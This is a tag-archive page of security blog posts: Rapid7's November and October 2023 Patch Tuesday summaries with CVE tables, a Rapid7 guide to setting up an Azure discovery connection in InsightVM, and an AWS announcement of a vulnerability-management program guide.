Tag Archives: Vulnerability management

Patch Tuesday – November 2023

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2023/11/14/patch-tuesday-november-2023/

Patch Tuesday - November 2023

Microsoft is addressing 64 vulnerabilities this November Patch Tuesday, including five zero-day vulnerabilities as well as one critical remote code execution (RCE) vulnerability. Overall, this month sees significantly fewer vulnerabilities addressed across a smaller number of products than has been typical of Patch Tuesday over the past year or two. Browser vulnerabilities account for 20 of the 64 vulnerabilities patched, and 14 of those are republished third-party vulnerabilities in Chromium.

Three vulnerabilities patched today are already present on the CISA Known Exploited Vulnerabilities (KEV) list: CVE-2023-36025, CVE-2023-36033, and CVE-2023-36036.

Windows SmartScreen: zero-day bypass

CVE-2023-36025 describes a Windows SmartScreen security feature bypass. An attacker who convinces a user to open a specially crafted malicious Internet Shortcut file could bypass the anti-phishing and anti-malware protection provided by Windows SmartScreen. This could be abused as an early stage in a more complex attack chain.

Windows DWM: zero-day EoP

Originally introduced in Windows Vista, the Windows Dynamic Window Manager (DWM) enables many of the modern UI features which users have come to expect from a Windows OS. This month, the DWM Core Library receives a patch for CVE-2023-36033, an elevation of privilege (EoP) vulnerability which Microsoft notes is both publicly disclosed and exploited in the wild. Exploitation leads to SYSTEM privileges, but Microsoft does not provide any further guidance on the attack mechanism.

Windows Cloud Files mini driver: zero-day EoP

Microsoft is patching CVE-2023-36036, an EoP vulnerability in the Windows Cloud Files Mini Filter Driver. No details of the attack mechanism are provided in the advisory, but exploitation leads to SYSTEM privileges.

Office Protected View: zero-day bypass

CVE-2023-36413 describes a publicly disclosed Microsoft Office security feature bypass. A user who opens a specially crafted malicious file would find themselves in Editing mode, rather than Protected View, and would thus lose out on warning banners and other defenses designed to detect and quarantine malicious code in Office documents.

ASP.NET Core: zero-day DoS

CVE-2023-36038 describes an ASP.NET Core denial of service (DoS) attack, which affects only .NET 8 RC 1 running on the IIS InProcess hosting model. The mechanism of the attack is resource exhaustion on the web server via cancellation of requests; this sounds very similar to last month’s CVE-2023-44487, dubbed “Rapid Reset”. However, there’s no mention of HTTP/2 in the advisory for CVE-2023-36038.

Fewer critical vulns this month

Only three vulnerabilities patched this month qualify as Critical under Microsoft’s proprietary severity ranking scale: one each in Windows Pragmatic General Multicast (PGM), the Azure CLI, and Windows HMAC Key Derivation.

Windows PGM: critical RCE via MSMQ

CVE-2023-36397 describes an RCE vulnerability in Windows PGM. As with other similar previous vulnerabilities, an attacker can send a specially-crafted file over the network to attempt malicious code execution on the target asset. Only systems where Windows Message Queueing Service (MSMQ) is enabled are exploitable, and it isn’t added to a default Windows installation. However, as Rapid7 has noted previously, administrators should be aware that a number of applications — including Microsoft Exchange — quietly introduce MSMQ as part of their own installation routine.

Hyper-V: critical VM escape

Attackers looking to escape from a low privilege Hyper-V guest OS and execute code as SYSTEM on the Hyper-V host system will take note of CVE-2023-36400. Successful exploitation requires running a specially crafted application in the context of the guest OS to exploit a weakness in Windows HMAC Key Derivation, so some prior access is required.

Azure CLI: critical credential leak via log files

The Azure CLI tool prior to version 2.53.1 does not sufficiently redact information published to log files in certain contexts, allowing recovery of plaintext(!) usernames and passwords. The advisory for CVE-2023-36052 notes that log files stored in open-source repositories are a potential avenue for credential leaks in this context. Although Microsoft understandably hasn’t provided any specific examples, it’s unlikely that they would mention this if they weren’t aware of one or more real world examples.

Exchange: RCE, spoofing, and ZDI disclosures

Patch Tuesday typically sees at least one Exchange remote code execution vulnerability fixed, and this month is no exception. Exploitation of CVE-2023-36439 requires that the attacker have valid credentials for an Exchange user, and be present on the local network, but grants execution as NT AUTHORITY\SYSTEM on Exchange server host; this is a built-in account with extensive privileges, including the ability to act as the computer on the network.

A trio of Exchange server spoofing vulnerabilities — CVE-2023-36035 CVE-2023-36039 and CVE-2023-36050 — are also patched today. Successful exploitation requires that an attacker be present on the local network with valid Exchange credentials, but can lead to exposure of credentials or an NTLM hash for other users. Two of these vulnerabilities are exploited via PowerShell remoting.

Somewhat conspicuous by their absence: four flaws in Exchange published by Trend Micro’s Zero Day Initiative (ZDI) on 2023-11-02 do not appear to have received patches today. Microsoft had previously told ZDI that these vulnerabilities did not require immediate servicing. Since Microsoft is the CVE Numbering Authority (CNA) for its own products, there are no publicly available CVE numbers for these vulnerabilities yet.

cURL: patch for much-anticipated vuln

Microsoft admins who have been waiting for a patch for last month’s cURL SOCKS5 vulnerability CVE-2023-38545 will be pleased to see that Microsoft has included curl.exe 8.4.0 as part of the November updates for current versions of Windows. Many observers ultimately concluded that this vulnerability was perhaps of more limited scope and attacker value than the pre-publication buzz may have suggested, but a patch is always appreciated.

Is it 23H2 already?

A new arrival: Windows 11 23H2 was released on 2023-10-31 across all editions, and receives its first patches today.

Summary Charts

Patch Tuesday - November 2023
All those Edge vulns make the Exchange bar look smaller.
Patch Tuesday - November 2023
A big month for Elevation of Privilege!
Patch Tuesday - November 2023
Very few Critical vulns this month, but more Moderate than we often see.
Patch Tuesday - November 2023
A cluster of Microsoft Dynamics spoofing and XSS vulns.

Summary Tables

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38151 Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability No No 8.8
CVE-2023-36437 Azure DevOps Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-36052 Azure CLI REST Command Information Disclosure Vulnerability No No 8.6
CVE-2023-36021 Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability No No 8

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36034 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability No No 7.3
CVE-2023-36014 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability No No 7.3
CVE-2023-36024 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability No No 7.1
CVE-2023-36027 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability No No 7.1
CVE-2023-36022 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability No No 6.6
CVE-2023-36029 Microsoft Edge (Chromium-based) Spoofing Vulnerability No No 4.3
CVE-2023-5996 Chromium: CVE-2023-5996 Use after free in WebAudio No No N/A
CVE-2023-5859 Chromium: CVE-2023-5859 Incorrect security UI in Picture In Picture No No N/A
CVE-2023-5858 Chromium: CVE-2023-5858 Inappropriate implementation in WebApp Provider No No N/A
CVE-2023-5857 Chromium: CVE-2023-5857 Inappropriate implementation in Downloads No No N/A
CVE-2023-5856 Chromium: CVE-2023-5856 Use after free in Side Panel No No N/A
CVE-2023-5855 Chromium: CVE-2023-5855 Use after free in Reading Mode No No N/A
CVE-2023-5854 Chromium: CVE-2023-5854 Use after free in Profiles No No N/A
CVE-2023-5853 Chromium: CVE-2023-5853 Incorrect security UI in Downloads No No N/A
CVE-2023-5852 Chromium: CVE-2023-5852 Use after free in Printing No No N/A
CVE-2023-5851 Chromium: CVE-2023-5851 Inappropriate implementation in Downloads No No N/A
CVE-2023-5850 Chromium: CVE-2023-5850 Incorrect security UI in Downloads No No N/A
CVE-2023-5849 Chromium: CVE-2023-5849 Integer overflow in USB No No N/A
CVE-2023-5482 Chromium: CVE-2023-5482 Insufficient data validation in USB No No N/A
CVE-2023-5480 Chromium: CVE-2023-5480 Inappropriate implementation in Payments No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36560 ASP.NET Security Feature Bypass Vulnerability No No 8.8
CVE-2023-36038 ASP.NET Core Denial of Service Vulnerability No Yes 8.2
CVE-2023-36018 Visual Studio Code Jupyter Extension Spoofing Vulnerability No No 7.8
CVE-2023-36049 .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability No No 7.6
CVE-2023-36042 Visual Studio Denial of Service Vulnerability No No 6.2
CVE-2023-36558 ASP.NET Core – Security Feature Bypass Vulnerability No No 6.2

ESU Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36397 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability No No 9.8
CVE-2023-36025 Windows SmartScreen Security Feature Bypass Vulnerability Yes No 8.8
CVE-2023-36017 Windows Scripting Engine Memory Corruption Vulnerability No No 8.8
CVE-2023-36402 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-36719 Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability No No 8.4
CVE-2023-36425 Windows Distributed File System (DFS) Remote Code Execution Vulnerability No No 8
CVE-2023-36393 Windows User Interface Application Core Remote Code Execution Vulnerability No No 7.8
CVE-2023-36705 Windows Installer Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36424 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36036 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Yes No 7.8
CVE-2023-36395 Windows Deployment Services Denial of Service Vulnerability No No 7.5
CVE-2023-36392 DHCP Server Service Denial of Service Vulnerability No No 7.5
CVE-2023-36423 Microsoft Remote Registry Service Remote Code Execution Vulnerability No No 7.2
CVE-2023-36401 Microsoft Remote Registry Service Remote Code Execution Vulnerability No No 7.2
CVE-2023-36403 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2023-36398 Windows NTFS Information Disclosure Vulnerability No No 6.5
CVE-2023-36428 Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability No No 5.5

Exchange Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36050 Microsoft Exchange Server Spoofing Vulnerability No No 8
CVE-2023-36039 Microsoft Exchange Server Spoofing Vulnerability No No 8
CVE-2023-36035 Microsoft Exchange Server Spoofing Vulnerability No No 8
CVE-2023-36439 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36007 Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability No No 7.6
CVE-2023-36410 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 7.6
CVE-2023-36031 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 7.6
CVE-2023-36016 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 6.2
CVE-2023-36030 Microsoft Dynamics 365 Sales Spoofing Vulnerability No No 6.1

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36045 Microsoft Office Graphics Remote Code Execution Vulnerability No No 7.8
CVE-2023-36037 Microsoft Excel Security Feature Bypass Vulnerability No No 7.8
CVE-2023-36041 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2023-36413 Microsoft Office Security Feature Bypass Vulnerability No Yes 6.5
CVE-2023-38177 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 6.1

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36422 Microsoft Windows Defender Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36043 Open Management Infrastructure Information Disclosure Vulnerability No No 6.5

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36028 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability No No 9.8
CVE-2023-36400 Windows HMAC Key Derivation Elevation of Privilege Vulnerability No No 8.8
CVE-2023-36408 Windows Hyper-V Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36407 Windows Hyper-V Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36033 Windows DWM Core Library Elevation of Privilege Vulnerability Yes Yes 7.8
CVE-2023-36396 Windows Compressed Folder Remote Code Execution Vulnerability No No 7.8
CVE-2023-36047 Windows Authentication Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36399 Windows Storage Elevation of Privilege Vulnerability No No 7.1
CVE-2023-36046 Windows Authentication Denial of Service Vulnerability No No 7.1
CVE-2023-36394 Windows Search Service Elevation of Privilege Vulnerability No No 7
CVE-2023-36405 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2023-36427 Windows Hyper-V Elevation of Privilege Vulnerability No No 7
CVE-2023-36404 Windows Kernel Information Disclosure Vulnerability No No 5.5
CVE-2023-36406 Windows Hyper-V Information Disclosure Vulnerability No No 5.5
CVE-2023-24023 Mitre: CVE-2023-24023 Bluetooth Vulnerability No No N/A

Updates

  • 2023-11-14: Shortly after initial publication, some Microsoft advisory web pages were not listing any patches, although patches did exist. Microsoft appears to have remediated the issue with the advisory web pages. Removed a paragraph from the blog which mentioned this.

Setup of Discovery Connection Azure

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/08/setup-of-discovery-connection-azure/

Setup of Discovery Connection Azure

By: fuzzy borders

Are you having trouble trying to get your Azure assets into your InsightVM security console? In this blog post, we wanted to bring additional insight into leveraging the Azure Discovery Connection with InsightVM.

This blog post is brought to you by the Fuzzy Borders project, whose members come from different teams across Rapid7. Our goal is to find answers for requests that may fall into gray (fuzzy) areas. Our past work includes example API calls and SQL queries for InsightVM Security Consoles.

We hope this blog will help you get started with assessing your Azure virtual machines in InsightVM.

There are 3 main areas of configuration: Azure App Registration, IAM Subscription, and InsightVM Discovery Connection configuration.

Here is the overview of the steps:

Azure Configuration

  1. App Registration
  2. API Permissions
  3. Generate and Save the Secret Value
  4. IAM role permissions (Subscriptions Tab)
  5. Attach Reader role to App Registration

InsightVM Discovery Connection Configuration
Prerequisite: Allow outbound traffic to Azure from the InsightVM console server.

  1. Create a new site for Azure assets*
  2. Create Azure Discovery Connection
  3. Enter Azure Tenant ID, Application ID, Application Secret certificate Value

*The Azure Site should be dedicated to this discovery connection only.

Please keep note of the following items:

Application ID

Directory ID (a.k.a Tenant ID)

Value for the certificate Secret.

Configure Azure

We need to establish trust between Rapid7 and Azure. Click on “App registrations”

Setup of Discovery Connection Azure

Click: New registration

Setup of Discovery Connection Azure

Enter a display name for the application and click Register at the bottom. In this example we use “FuzzyDiscovery”

Setup of Discovery Connection Azure

We leave default values. Once you click Register it will return the Application ID, and Directory ID (a.k.a Tenant ID) that will be required in later steps.

Tip:
Either take a screenshot or copy and paste both the Application and Directory ID to a secure location to reference later.

Generate and Save the Secret Value

Click on Certificates & Secrets, click: Client Secrets, and add New Client Secret

Setup of Discovery Connection Azure

Important Note: We require the generated Secret Certificate Value, not the Secret ID.

Setup of Discovery Connection Azure

Configure API Permissions

Click on “Add a Permission” Search and Select: “Directory.Read.All”, and click Grant and Consent

Setup of Discovery Connection Azure

Setup of Discovery Connection Azure

Subscription Access

Click Home, and click Subscription, to set up our IAM role.

In the Subscriptions page, click Access Control (IAM), and click Add Role Assignment under “Grant access to this resource”

Setup of Discovery Connection Azure

Select the Reader role

Setup of Discovery Connection Azure

Enter the member created earlier. (Example: FuzzyDiscovery)

Setup of Discovery Connection Azure

Configure Console
Prerequisite: Allow outbound access to Azure https://docs.rapid7.com/nexpose/creating-and-managing-dynamic-discovery-connections/#preparing-insightvm

Create a dedicated new Site as a Destination for your Azure assets https://docs.rapid7.com/nexpose/creating-and-managing-dynamic-discovery-connections/#adding-a-microsoft-azure-connection

Create Azure Discovery Connection

Navigate to Administration – click: Discovery Connections

Setup of Discovery Connection Azure

From Azure App Registration fill out:

Tenant ID
Application ID

Application Security Certificate Value previously generated in Azure

Please note: In the case the secret was not saved previously, a new secret will have to be generated, and the previously generated secret can be revoked.

Troubleshooting Tips:

In the InsightVM console logs, review the eso.log for any errors and provide logs to support via a case.

Now available: Building a scalable vulnerability management program on AWS

Post Syndicated from Anna McAbee original https://aws.amazon.com/blogs/security/now-available-how-to-build-a-scalable-vulnerability-management-program-on-aws/

Vulnerability findings in a cloud environment can come from a variety of tools and scans depending on the underlying technology you’re using. Without processes in place to handle these findings, they can begin to mount, often leading to thousands to tens of thousands of findings in a short amount of time. We’re excited to announce the Building a scalable vulnerability management program on AWS guide, which includes how you can build a structured vulnerability management program, operationalize tooling, and scale your processes to handle a large number of findings from diverse sources.

Building a scalable vulnerability management program on AWS focuses on the fundamentals of building a cloud vulnerability management program, including traditional software and network vulnerabilities and cloud configuration risks. The guide covers how to build a successful and scalable vulnerability management program on AWS through preparation, enabling and configuring tools, triaging findings, and reporting.

Targeted outcomes

This guide can help you and your organization with the following:

  • Develop policies to streamline vulnerability management and maintain accountability.
  • Establish mechanisms to extend the responsibility of security to your application teams.
  • Configure relevant AWS services according to best practices for scalable vulnerability management.
  • Identify patterns for routing security findings to support a shared responsibility model.
  • Establish mechanisms to report on and iterate on your vulnerability management program.
  • Improve security finding visibility and help improve overall security posture.

Using the new guide

We encourage you to read the entire guide before taking action or building a list of changes to implement. After you read the guide, assess your current state compared to the action items and check off the items that you’ve already completed in the Next steps table. This will help you assess the current state of your AWS vulnerability management program. Then, plan short-term and long-term roadmaps based on your gaps, desired state, resources, and business needs. Building a cloud vulnerability management program often involves iteration, so you should prioritize key items and regularly revisit your backlog to keep up with technology changes and your business requirements.

Further information

For more information and to get started, see the Building a scalable vulnerability management program on AWS.

We greatly value feedback and contributions from our community. To share your thoughts and insights about the guide, your experience using it, and what you want to see in future versions, select Provide feedback at the bottom of any page in the guide and complete the form.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Anna McAbee

Anna is a Security Specialist Solutions Architect focused on threat detection and incident response at AWS. Before AWS, she worked as an AWS customer in financial services on both the offensive and defensive sides of security. Outside of work, Anna enjoys cheering on the Florida Gators football team, wine tasting, and traveling the world.

Author

Megan O’Neil

Megan is a Principal Security Specialist Solutions Architect focused on Threat Detection and Incident Response. Megan and her team enable AWS customers to implement sophisticated, scalable, and secure solutions that solve their business challenges. Outside of work, Megan loves to explore Colorado, including mountain biking, skiing, and hiking.

Patch Tuesday – October 2023

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2023/10/10/patch-tuesday-october-2023/

Patch Tuesday - October 2023

Microsoft is addressing 105 vulnerabilities this October Patch Tuesday, including three zero-day vulnerabilities, as well as 12 critical remote code execution (RCE) vulnerabilities, and one republished third-party vulnerability.

WordPad: zero-day NTLM hash disclosure

Another Patch Tuesday, another zero-day vulnerability offering NTLM hash disclosure, this time in WordPad. The advisory for CVE-2023-36563 describes two possible attack vectors: 1) enticing the user to open a specially crafted malicious file delivered via email, IM, or some other means, or 2) by causing a custom application to run. The advisory doesn’t give much more detail, but the attacker would either need existing access to the system, or some means of exfiltrating the NTLM hash. It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given. Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.

Skype for Business server: zero-day info disclosure

Defenders responsible for a Skype for Business server should take note of an exploited-in-the-wild information disclosure vulnerability for which public exploit code exists. Successful exploitation of CVE-2023-41763 via a specially crafted network call could result in the disclosure of IP addresses and/or port numbers. Although Microsoft does not specify what the scope of the disclosure might be, it will presumably be limited to whatever the Skype for Business server can see; as always, appropriate network segmentation will pay defense-in-depth dividends.

ASP.NET Kestrel web server: zero-day denial of service

Rounding out this month’s trio of exploited-in-the-wild vulnerabilities, and perhaps of less concern: the cross-platform Kestrel web server for ASP.NET Core receives a fix for CVE-2023-44487, a denial of service vulnerability. In the advisory, Microsoft provides essentially no information about attack vector beyond the fact that the vulnerability is specific to HTTP/2 , but does suggest two potential workarounds:

  1. Disabling the HTTP/2 protocol via a Windows Registry modification; and/or
  2. Restricting protocols offered each Kestrel endpoint to exclude HTTP/2.

Microsoft advises timely patching regardless of whether or not one or more workarounds are applied.

N.B. In the advisory, a hyperlink attached to the word “workarounds” does not resolve to anything specific, and Kestrel is misspelled as “Kestral” more than once, although these issues will likely be resolved soon.

Layer 2 Tunneling Protocol: lots of critical RCEs

Twelve critical RCE vulnerabilities seems like a lot, and it is. Fully three-quarters of these are in the same Windows component — the Layer 2 Tunneling Protocol — which has already received fixes for a significant number of critical RCEs in recent months. Exploitation of each of the Layer 2 Tunneling Protocol critical RCEs this month — CVE-2023-41765 CVE-2023-41767 CVE-2023-41768 CVE-2023-41769 CVE-2023-41770 CVE-2023-41771 CVE-2023-41773 CVE-2023-41774 and CVE-2023-38166 — is via a specially crafted protocol message to a Routing and Remote Access Service (RRAS) server.

If there is a silver lining here, it’s that the acknowledgements for almost all of these vulnerabilities cite Microsoft’s Network Security and Containers (NSC) team; a reasonable inference is that Microsoft is directing significant resources towards security research and patching in this area. Since CVEs are typically assigned sequentially, and there are gaps in the sequence, another reasonable inference here is that other similar as-yet-unpublished vulnerabilities have probably been identified and reported to MSRC.

Windows MSMQ: critical RCEs

CVE-2023-35349 describes an RCE vulnerability in the Message Queueing Service. Microsoft does not describe the attack vector, but other similar vulnerabilities require that the attacker send specially crafted malicious MSMQ packet to a MSMQ server. One mitigating factor: the Microsoft Message Queueing Service must be enabled and listening on port 1801 for an asset to be vulnerable, and the Message Queueing Service is not installed by default. As Rapid7 has noted previously, however, a number of applications – including Microsoft Exchange – may quietly introduce MSMQ as part of their own installation routine.

Another MSMQ RCE vulnerability also receives a patch this month: CVE-2023-36697 has a lower CVSS score than its sibling, both because valid domain credentials are required, and because exploitation requires that a user on the target machine connects to a malicious server. Alternatively, Microsoft suggests that an attacker could compromise a legitimate MSMQ server host and make it run as a malicious server to exploit this vulnerability, although it’s not immediately clear how the attacker could do that without already having significant control over the MSMQ host.

Microsoft vTPM: container escape

The final constituent of this month’s dozen patched critical RCE vulnerabilities is rather more exotic: CVE-2023-36718 describes a vulnerability in the Microsoft Virtual Trusted Platform Module (vTPM), which is a TPM 2.0-compliant virtualized version of a hardware TPM offered as a feature of Azure confidential VMs. Successful exploitation could lead to a container escape. The attacker would first need to access the vulnerable VM, and the advisory notes that exploitation is possible when authenticated as a guest mode user. On the bright side, Microsoft evaluates attack complexity as High, since ​​successful exploitation of this vulnerability would rely upon complex memory shaping techniques to attempt an attack.

Exchange (as is tradition): RCE

Exchange administrators should note the existence of CVE-2023-36778, a same-network RCE vulnerability in all current versions of Exchange Server. Successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell remoting session. By default, PowerShell Remoting only allows connections from members of the Administrators group, and the relevant Windows Firewall rule for connections via public networks rejects connections from outside the same subnet. Defenders may wish to review these rules to ensure that they have not been loosened beyond the default.

Office: LPE

Microsoft Office receives a patch for CVE-2023-36569, a local privilege escalation (LPE) vulnerability. Successful exploitation could lead to SYSTEM privileges, but Microsoft states that the Preview Pane is not a vector. The advisory doesn’t provide much more information; patches are available for Office 2019, 2021, and Apps for Enterprise. Office 2016 is not listed, which might signify that it isn’t vulnerable, or could mean that patches will be provided later.

End of the line: 2012 edition

Today is the final Patch Tuesday for Windows Server 2012, and Windows Server 2012 R2. The only way to receive security updates for these versions of Windows from now on is to subscribe to Microsoft’s last-resort Extended Security Update (ESU) program. Windows 11 21H2 Home, Pro, Pro Education, Pro for Workstations, and SE also move past the end of support. No ESU program is available for Windows 11 client OS, so Windows 11 21H2 assets are insecure-by-default from now on. In all cases, both Microsoft and Rapid7 recommend upgrading to a newer version of Windows as soon as possible.

Summary Charts

Patch Tuesday - October 2023
That’s a long line of Message Queueing vulns.
Patch Tuesday - October 2023
Denial of Service up one place to third. RCE holds the top spot as usual.
Patch Tuesday - October 2023
As usual, no Low or Moderate criticality vulns. It’s not that they don’t exist or get reported, but like all vendors remediating security issues, Microsoft necessarily focuses on those with the highest severity.
Patch Tuesday - October 2023
A relatively long list of components this month, and lots of RCE.

Summary Table

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36415 Azure Identity SDK Remote Code Execution Vulnerability No No 8.8
CVE-2023-36414 Azure Identity SDK Remote Code Execution Vulnerability No No 8.8
CVE-2023-36419 Azure HDInsight Apache Oozie Workflow Scheduler Elevation of Privilege Vulnerability No No 8.8
CVE-2023-36418 Azure RTOS GUIX Studio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36737 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability No No 7.8

Azure Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36561 Azure DevOps Server Elevation of Privilege Vulnerability No No 7.3

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-5346 Chromium: CVE-2023-5346 Type Confusion in V8 No No N/A

ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36790 Windows RDP Encoder Mirror Driver Elevation of Privilege Vulnerability No No 7.8

Exchange Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36778 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36433 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability No No 6.5
CVE-2023-36429 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability No No 6.5
CVE-2023-36566 Microsoft Common Data Model SDK Denial of Service Vulnerability No No 6.5
CVE-2023-36416 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 6.1

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36569 Microsoft Office Elevation of Privilege Vulnerability No No 8.4
CVE-2023-36789 Skype for Business Remote Code Execution Vulnerability No No 7.2
CVE-2023-36786 Skype for Business Remote Code Execution Vulnerability No No 7.2
CVE-2023-36780 Skype for Business Remote Code Execution Vulnerability No No 7.2
CVE-2023-36565 Microsoft Office Graphics Elevation of Privilege Vulnerability No No 7
CVE-2023-36568 Microsoft Office Click-To-Run Elevation of Privilege Vulnerability No No 7
CVE-2023-41763 Skype for Business Elevation of Privilege Vulnerability Yes Yes 5.3

SQL Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36417 Microsoft SQL ODBC Driver Remote Code Execution Vulnerability No No 7.8
CVE-2023-36730 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability No No 7.8
CVE-2023-36785 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability No No 7.8
CVE-2023-36420 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability No No 7.3
CVE-2023-36728 Microsoft SQL Server Denial of Service Vulnerability No No 5.5

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36704 Windows Setup Files Cleanup Remote Code Execution Vulnerability No No 7.8
CVE-2023-36711 Windows Runtime C++ Template Library Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36725 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36723 Windows Container Manager Service Elevation of Privilege Vulnerability No No 7.8
CVE-2023-41772 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36557 PrintHTML API Remote Code Execution Vulnerability No No 7.8
CVE-2023-36729 Named Pipe File System Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36718 Microsoft Virtual Trusted Platform Module Remote Code Execution Vulnerability No No 7.8
CVE-2023-36701 Microsoft Resilient File System (ReFS) Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36603 Windows TCP/IP Denial of Service Vulnerability No No 7.5
CVE-2023-36720 Windows Mixed Reality Developer Tools Denial of Service Vulnerability No No 7.5
CVE-2023-36709 Microsoft AllJoyn API Denial of Service Vulnerability No No 7.5
CVE-2023-36605 Windows Named Pipe Filesystem Elevation of Privilege Vulnerability No No 7.4
CVE-2023-36902 Windows Runtime Remote Code Execution Vulnerability No No 7
CVE-2023-38159 Windows Graphics Component Elevation of Privilege Vulnerability No No 7
CVE-2023-36721 Windows Error Reporting Service Elevation of Privilege Vulnerability No No 7
CVE-2023-36717 Windows Virtual Trusted Platform Module Denial of Service Vulnerability No No 6.5
CVE-2023-36707 Windows Deployment Services Denial of Service Vulnerability No No 6.5
CVE-2023-36596 Remote Procedure Call Information Disclosure Vulnerability No No 6.5
CVE-2023-36576 Windows Kernel Information Disclosure Vulnerability No No 5.5
CVE-2023-36698 Windows Kernel Security Feature Bypass Vulnerability No No 3.6

Windows Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38171 Microsoft QUIC Denial of Service Vulnerability No No 7.5
CVE-2023-36435 Microsoft QUIC Denial of Service Vulnerability No No 7.5
CVE-2023-44487 MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack Yes No N/A

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36434 Windows IIS Server Elevation of Privilege Vulnerability No No 9.8
CVE-2023-35349 Microsoft Message Queuing Remote Code Execution Vulnerability No No 9.8
CVE-2023-36577 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-41765 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41767 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41768 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41769 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41770 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41771 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41773 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-41774 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
CVE-2023-38166 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability No No 8.1
